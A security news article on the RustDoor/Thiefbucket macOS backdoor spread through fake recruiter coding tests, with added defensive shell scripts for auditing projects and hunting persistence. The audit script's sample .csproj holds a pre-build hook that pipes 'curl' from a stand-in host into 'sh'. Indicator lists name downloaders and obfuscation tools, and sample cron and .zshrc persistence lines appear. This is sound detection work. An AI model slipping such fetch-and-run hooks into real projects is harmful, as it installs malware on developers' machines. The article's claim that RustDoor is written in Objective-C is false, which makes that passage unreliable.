Date: September 16, 2024
Cybersecurity researchers are raising alarms about threat actors targeting cryptocurrency users on LinkedIn using malware known as RustDoor. The latest warning comes from Jamf Threat Labs, which identified an attack where a user was approached on LinkedIn by someone posing as a recruiter from STON.fi, a legitimate decentralized cryptocurrency exchange (DEX).
These cyberattacks are part of a larger trend involving "highly tailored, difficult-to-detect social engineering campaigns," as highlighted by the U.S. Federal Bureau of Investigation (FBI). The attacks focus on employees in decentralized finance (DeFi), cryptocurrency, and related industries. One common tactic is asking targets to execute code or install applications on devices that have access to company networks.
Another tactic is asking the target to complete a pre-employment test or debugging exercise. These exercises typically require running code the attacker supplies, such as an npm (Node.js) or PyPI (Python) package, a script, or a GitHub repository, any of which can carry malware onto the target's machine.
In the most recent attack uncovered by Jamf Threat Labs, the victim is tricked into downloading a malicious Visual Studio project as part of a fake coding challenge. Embedded in the project are bash commands that fetch two second-stage payloads, VisualStudioHelper and zsh_env. Both payloads are backdoors with identical functionality.
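An added example, not code from Jamf's report or from the attacker's project: a POSIX shell audit that greps an unpacked take-home project for build hooks and downloader patterns before an IDE is allowed to build it. The MSBuild Exec hook in the sample .csproj (Exec is a real MSBuild task; the URL and command are placeholders), the indicator list and the file layout are constructed for illustration and are not the STON.fi lure itself.

```shell
#!/bin/sh
# Added example (not Jamf's or the attacker's code): audit an unpacked
# "coding challenge" project for build-time command execution and downloader
# patterns before letting an IDE build it. Patterns and sample files are
# constructed for illustration.

# Strings that have no business in a take-home coding test.
# Assumption: this list is illustrative; extend it for your environment.
SUSPICIOUS_PATTERNS='curl[[:space:]]|wget[[:space:]]|[|][[:space:]]*(ba|z)?sh([^[:alnum:]_]|$)|base64[[:space:]]+(-d|--decode)|chmod[[:space:]]+[+]x|osascript|nohup|/tmp/|LaunchAgents'

# audit_project DIR: print file:line:text for every hit in project, build
# and task files. Returns 0 when the project looks clean, 1 when something
# was found. The /dev/null argument forces grep to prefix file names even
# when find hands it a single file.
audit_project() {
  hits=$(find "$1" -type f \( -name '*.csproj' -o -name '*.sln' -o -name '*.props' \
          -o -name '*.targets' -o -name '*.sh' -o -name 'Makefile' \
          -o -name 'package.json' -o -name 'setup.py' -o -name 'tasks.json' \) \
          -exec grep -nE "$SUSPICIOUS_PATTERNS" /dev/null {} + 2>/dev/null)
  [ -z "$hits" ] && return 0
  printf '%s\n' "$hits"
  return 1
}

# make_sample: write a constructed project that mimics a lure. The visible
# source is harmless; a pre-build target fetches and runs a second stage.
# Prints the directory it created.
make_sample() {
  d=$(mktemp -d)
  mkdir -p "$d/Challenge"
  cat > "$d/Challenge/Challenge.csproj" <<'EOF'
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net8.0</TargetFramework></PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="Build">
    <Exec Command="curl -fsSL http://example.invalid/stage2 | sh" />
  </Target>
</Project>
EOF
  cat > "$d/Challenge/Program.cs" <<'EOF'
// The "challenge" code is a decoy; the build hook in the .csproj is the payload.
class Program { static void Main() { System.Console.WriteLine("solve me"); } }
EOF
  printf '%s\n' "$d"
}

# Usage: sh audit_project.sh /path/to/unpacked/project
if [ "$#" -gt 0 ]; then
  audit_project "$1"
fi
```

Run it on the unpacked archive before opening anything in an IDE; a non-zero exit with the offending line printed is the signal to stop and send the archive to your security team rather than to build it. The check is deliberately dumb string matching: it catches the pattern this campaign used (a build step that fetches and executes a script) but not a project that ships its loader as a compiled binary, so treat a clean result as necessary, not sufficient.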
The second-stage malware, known as RustDoor (Jamf tracks it as Thiefbucket), is a macOS backdoor. The zipped coding test had been uploaded to VirusTotal on August 7, 2024, yet at the time of Jamf's report none of the anti-malware engines there flagged it as malicious.
According to Jamf researchers Jaron Bradley and Ferdous Saljooki, RustDoor persists on an infected system through a cron job and an entry in the user's .zshrc file (the startup script zsh runs for every new interactive shell), so it survives reboots and is re-launched whenever the user opens a terminal. The malware was first documented by Bitdefender in February 2024, when it was used against cryptocurrency firms. Later research by S2W uncovered a Golang variant aimed at Windows machines.
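As an added example that is not part of Jamf's write-up, the following POSIX shell snippet checks a user's crontab and zsh startup files for entries resembling the two persistence mechanisms just described. The indicator list, the placeholder paths and the sample crontab and .zshrc contents are constructed for illustration; only the payload file names VisualStudioHelper and zsh_env come from the report.

```shell
#!/bin/sh
# Added example (not code from Jamf's report): hunt for the two persistence
# mechanisms named above, a user cron job and a line in ~/.zshrc, on a macOS
# host. Indicator patterns and the sample crontab/.zshrc are constructed.

# Indicators for a suspicious persistence line.
# Assumption: illustrative list; the two payload names come from the report,
# the directories are placeholders, tune both for your fleet.
PERSIST_PATTERNS='VisualStudioHelper|zsh_env|/tmp/|/private/tmp/|/var/tmp/|/Users/Shared/|curl[[:space:]]|wget[[:space:]]|base64|nohup|osascript'

# scan_text LABEL TEXT: print LABEL:line:text for every matching line.
# Returns 0 if at least one line matched, 1 if the text is clean.
# sed uses '|' as its delimiter so LABEL may be a file path.
scan_text() {
  hits=$(printf '%s\n' "$2" | grep -nE "$PERSIST_PATTERNS")
  [ -n "$hits" ] || return 1
  printf '%s\n' "$hits" | sed "s|^|$1:|"
}

# check_host: run the scan over the live user crontab and the zsh startup
# files. Returns 0 if anything suspicious was found, 1 otherwise.
check_host() {
  found=1
  scan_text crontab "$(crontab -l 2>/dev/null)" && found=0
  for f in "$HOME/.zshrc" "$HOME/.zshenv" "$HOME/.zprofile"; do
    [ -f "$f" ] && scan_text "$f" "$(cat "$f")" && found=0
  done
  return $found
}

# Constructed samples: two benign lines, then a persistence line of the kind
# described in the report (every five minutes via cron; at shell start via
# .zshrc, backgrounded so the user's prompt is not delayed).
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/bin/find "$HOME/Downloads" -mtime +30 -delete
*/5 * * * * "$HOME/Library/Application Support/VisualStudioHelper/VisualStudioHelper" >/dev/null 2>&1'

SAMPLE_ZSHRC='export PATH="$HOME/bin:$PATH"
alias ll="ls -la"
nohup "$HOME/.zsh_env/zsh_env" >/dev/null 2>&1 &'

# Usage: source this file, then run check_host on a suspect Mac, or
# scan_text <label> "$(cat some_file)" on content collected from it.
```

Every match is printed with its source and line number, so a hit in ~/.zshrc can be removed by line and a cron hit points at the binary to collect before it is cleaned up. The snippet only covers the user's own crontab and zsh startup files, which is what the report describes; root's crontab and LaunchAgent or LaunchDaemon plists are not examined here.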
RustDoor is particularly concerning not only because it has now been attributed to North Korean threat actors, but also because it is written in Objective-C, the language of much legitimate macOS software, which lets its binaries blend in with ordinary Mac applications and makes the malware harder to detect.
VisualStudioHelper, one of the two payloads, also acts as an information stealer. It harvests specific files according to the malware's configuration and, to obtain the user's system password, displays a credential prompt disguised as a legitimate dialog from the Visual Studio application, which makes the attack even harder to spot.
Both RustDoor payloads function as backdoors, communicating with command-and-control (C2) servers via two distinct channels.
The research highlights the growing sophistication of attacks on the cryptocurrency sector. According to Jamf Threat Labs, the attackers use elaborate social engineering schemes, are well-versed in English, and often research their targets thoroughly before making contact.
The researchers stress the importance of cybersecurity training, particularly for developers and other employees in the cryptocurrency space. Users should be cautious when engaging with unknown contacts on social media, especially if asked to run software.
“Threat actors continue to evolve their methods to target the crypto industry,” the researchers said. “Training your employees to be suspicious of unsolicited requests to run software is key to preventing these types of attacks.”
North Korean cyber actors continue to pose a significant threat to the cryptocurrency industry, using advanced techniques to infiltrate companies and steal valuable assets. Organizations are urged to remain vigilant and implement strict cybersecurity protocols to protect against these emerging threats.